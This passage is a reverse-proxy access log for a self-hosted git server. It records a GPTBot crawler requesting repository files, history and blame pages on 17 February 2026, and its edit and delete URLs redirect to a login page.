"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/.gitignore" -[17/Feb/2026:15:07:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/.gitignore" -[17/Feb/2026:15:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 12084] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 10035] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:07:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/.gitignore" -[17/Feb/2026:15:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/.gitignore" -[17/Feb/2026:15:07:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/.gitignore" -[17/Feb/2026:15:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/.gitignore" -[17/Feb/2026:15:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 1529] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:15:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:15:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main" [Client 74.7.227.38] [Length 11644] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main" [Client 74.7.227.38] [Length 9991] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:15:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8485] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/nginx.conf" [Client 74.7.227.38] [Length 12081] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln" [Client 74.7.227.38] [Length 11914] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:15:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fDOCKER_GUIDE.md" [Client 74.7.227.38] [Length 37543] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:15:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fREADME.md" [Client 74.7.227.38] [Length 29394] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:15:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:15:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:15:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" -[17/Feb/2026:15:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" -[17/Feb/2026:15:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" -[17/Feb/2026:15:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx.conf" -[17/Feb/2026:15:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/nginx.conf" -[17/Feb/2026:15:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/projects.sln" -[17/Feb/2026:15:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/projects.sln" [Client 74.7.227.38] [Length 11202] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/projects.sln" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/projects.sln" -[17/Feb/2026:15:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx.conf" -[17/Feb/2026:15:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/nginx.conf" -[17/Feb/2026:15:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/projects.sln" [Client 74.7.227.38] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/projects.sln" [Client 74.7.227.38] [Length 871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fservices%2fgeminiService.ts" [Client 74.7.227.38] [Length 25015] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages" [Client 74.7.227.38] [Length 26171] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:15:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 36000] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:15:07:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/projects.sln" -[17/Feb/2026:15:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/projects.sln" -[17/Feb/2026:15:07:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/projects.sln" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/projects.sln" -[17/Feb/2026:15:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/projects.sln" -[17/Feb/2026:15:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14852] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 